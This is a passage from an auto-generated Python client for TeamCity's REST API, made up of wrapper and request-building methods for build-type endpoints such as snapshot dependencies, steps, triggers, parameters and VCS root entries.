This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_snapshot_dep(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:param str fields:
:param SnapshotDependency body:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, **kwargs) # noqa: E501
return data
def replace_snapshot_deps(self, bt_locator, **kwargs): # noqa: E501
"""replace_snapshot_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_snapshot_deps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param SnapshotDependencies body:
:return: SnapshotDependencies
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_snapshot_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_snapshot_deps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def replace_step(self, bt_locator, step_id, **kwargs): # noqa: E501
"""replace_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_step(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:param Step body:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
else:
(data) = self.__replace_step_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
return data
def replace_step_parameters(self, bt_locator, step_id, **kwargs): # noqa: E501
"""replace_step_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_step_parameters(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str step_id: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_step_parameters_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
else:
(data) = self.__replace_step_parameters_with_http_info(bt_locator, step_id, **kwargs) # noqa: E501
return data
def replace_steps(self, bt_locator, **kwargs): # noqa: E501
"""replace_steps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_steps(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Steps body:
:return: Steps
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_steps_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_steps_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def replace_trigger(self, bt_locator, trigger_locator, **kwargs): # noqa: E501
"""replace_trigger # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_trigger(bt_locator, trigger_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str fields:
:param Trigger body:
:return: Trigger
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_trigger_with_http_info(bt_locator, trigger_locator, **kwargs) # noqa: E501
return data
def replace_triggers(self, bt_locator, **kwargs): # noqa: E501
"""replace_triggers # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_triggers(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:param Triggers body:
:return: Triggers
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_triggers_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_triggers_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def replace_vcs_root_entries(self, bt_locator, **kwargs): # noqa: E501
"""replace_vcs_root_entries # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_vcs_root_entries(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param VcsRootEntries body:
:param str fields:
:return: VcsRootEntries
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__replace_vcs_root_entries_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__replace_vcs_root_entries_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def serve_branches(self, bt_locator, **kwargs): # noqa: E501
"""serve_branches # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_branches(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Branches
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_branches_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__serve_branches_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def serve_build_field(self, bt_locator, build_locator, field, **kwargs): # noqa: E501
"""serve_build_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_build_field(bt_locator, build_locator, field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_build_field_with_http_info(bt_locator, build_locator, field, **kwargs) # noqa: E501
else:
(data) = self.__serve_build_field_with_http_info(bt_locator, build_locator, field, **kwargs) # noqa: E501
return data
def serve_build_type_builds_tags(self, bt_locator, field, **kwargs): # noqa: E501
"""serve_build_type_builds_tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_build_type_builds_tags(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: Tags
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_build_type_builds_tags_with_http_info(bt_locator, field, **kwargs) # noqa: E501
else:
(data) = self.__serve_build_type_builds_tags_with_http_info(bt_locator, field, **kwargs) # noqa: E501
return data
def serve_build_type_field(self, bt_locator, field, **kwargs): # noqa: E501
"""serve_build_type_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_build_type_field(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_build_type_field_with_http_info(bt_locator, field, **kwargs) # noqa: E501
else:
(data) = self.__serve_build_type_field_with_http_info(bt_locator, field, **kwargs) # noqa: E501
return data
def serve_build_type_xml(self, bt_locator, **kwargs): # noqa: E501
"""serve_build_type_xml # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_build_type_xml(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_build_type_xml_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__serve_build_type_xml_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def serve_build_with_project(self, bt_locator, build_locator, **kwargs): # noqa: E501
"""serve_build_with_project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_build_with_project(bt_locator, build_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str fields:
:return: Build
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_build_with_project_with_http_info(bt_locator, build_locator, **kwargs) # noqa: E501
else:
(data) = self.__serve_build_with_project_with_http_info(bt_locator, build_locator, **kwargs) # noqa: E501
return data
def serve_builds(self, bt_locator, **kwargs): # noqa: E501
"""serve_builds # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_builds(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_builds_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__serve_builds_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def set_build_type_field(self, bt_locator, field, **kwargs): # noqa: E501
"""set_build_type_field # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_build_type_field(bt_locator, field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_build_type_field_with_http_info(bt_locator, field, **kwargs) # noqa: E501
else:
(data) = self.__set_build_type_field_with_http_info(bt_locator, field, **kwargs) # noqa: E501
return data
def set_parameter(self, bt_locator, **kwargs): # noqa: E501
"""set_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_0(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_0(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_1(self, bt_locator, **kwargs): # noqa: E501
"""set_parameter_1 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_1(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_1_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_1_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_2(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_2 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_2(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param ModelProperty body:
:param str fields:
:return: ModelProperty
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_2_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_2_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_type(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_type(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param Type body:
:return: Type
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_type_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_type_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_type_raw_value(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_type_raw_value # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_type_raw_value(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_type_raw_value_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_type_raw_value_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_value_long(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_value_long # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_value_long(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_value_long_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_value_long_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def set_parameter_value_long_0(self, name, bt_locator, **kwargs): # noqa: E501
"""set_parameter_value_long_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameter_value_long_0(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str name: (required)
:param str bt_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameter_value_long_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameter_value_long_0_with_http_info(name, bt_locator, **kwargs) # noqa: E501
return data
def set_parameters(self, bt_locator, **kwargs): # noqa: E501
"""set_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameters(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameters_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def set_parameters_0(self, bt_locator, **kwargs): # noqa: E501
"""set_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_parameters_0(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param Properties body:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_parameters_0_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def set_templates(self, bt_locator, **kwargs): # noqa: E501
"""set_templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_templates(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param BuildTypes body:
:param bool optimize_settings:
:param str fields:
:return: BuildTypes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_templates_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_templates_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def set_vcs_labeling_options(self, bt_locator, **kwargs): # noqa: E501
"""set_vcs_labeling_options # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_vcs_labeling_options(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param VcsLabeling body:
:return: VcsLabeling
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__set_vcs_labeling_options_with_http_info(bt_locator, **kwargs) # noqa: E501
else:
(data) = self.__set_vcs_labeling_options_with_http_info(bt_locator, **kwargs) # noqa: E501
return data
def update_vcs_root_entry(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""update_vcs_root_entry # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_vcs_root_entry(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:param VcsRootEntry body:
:param str fields:
:return: VcsRootEntry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__update_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
else:
(data) = self.__update_vcs_root_entry_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
return data
def update_vcs_root_entry_checkout_rules(self, bt_locator, vcs_root_locator, **kwargs): # noqa: E501
"""update_vcs_root_entry_checkout_rules # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_vcs_root_entry_checkout_rules(bt_locator, vcs_root_locator, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str bt_locator: (required)
:param str vcs_root_locator: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__update_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
else:
(data) = self.__update_vcs_root_entry_checkout_rules_with_http_info(bt_locator, vcs_root_locator, **kwargs) # noqa: E501
return data
def __add_agent_requirement_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_agent_requirement_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param AgentRequirement body:
:return: AgentRequirement
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_agent_requirement" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_agent_requirement`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentRequirement', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_artifact_dep_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_artifact_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_artifact_dep_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param ArtifactDependency body:
:return: ArtifactDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_artifact_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_artifact_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/artifact-dependencies', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArtifactDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_build_type_with_http_info(self, **kwargs): # noqa: E501
"""add_build_type # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_build_type_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param BuildType body:
:param str fields:
:return: BuildType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_build_type" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_feature_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_feature # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_feature_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param Feature body:
:return: Feature
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_feature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_feature`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Feature', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_feature_parameter_with_http_info(self, bt_locator, feature_id, parameter_name, **kwargs): # noqa: E501
"""add_feature_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str feature_id: (required)
:param str parameter_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'feature_id', 'parameter_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_feature_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `add_feature_parameter`") # noqa: E501
# verify the required parameter 'feature_id' is set
if ('feature_id' not in params or
params['feature_id'] is None):
raise ValueError("Missing the required parameter `feature_id` when calling `add_feature_parameter`") # noqa: E501
# verify the required parameter 'parameter_name' is set
if ('parameter_name' not in params or
params['parameter_name'] is None):
raise ValueError("Missing the required parameter `parameter_name` when calling `add_feature_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'feature_id' in params:
if isinstance(params['feature_id'], TeamCityObject):
path_params['featureId'] = params['feature_id'].locator_id
else:
path_params['featureId'] = params['feature_id'] # noqa: E501
if 'parameter_name' in params:
if isinstance(params['parameter_name'], TeamCityObject):
path_params['parameterName'] = params['parameter_name'].locator_id
else:
path_params['parameterName'] = params['parameter_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters/{parameterName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __add_snapshot_dep_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""add_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_snapshot_dep_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:param SnapshotDependency body:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
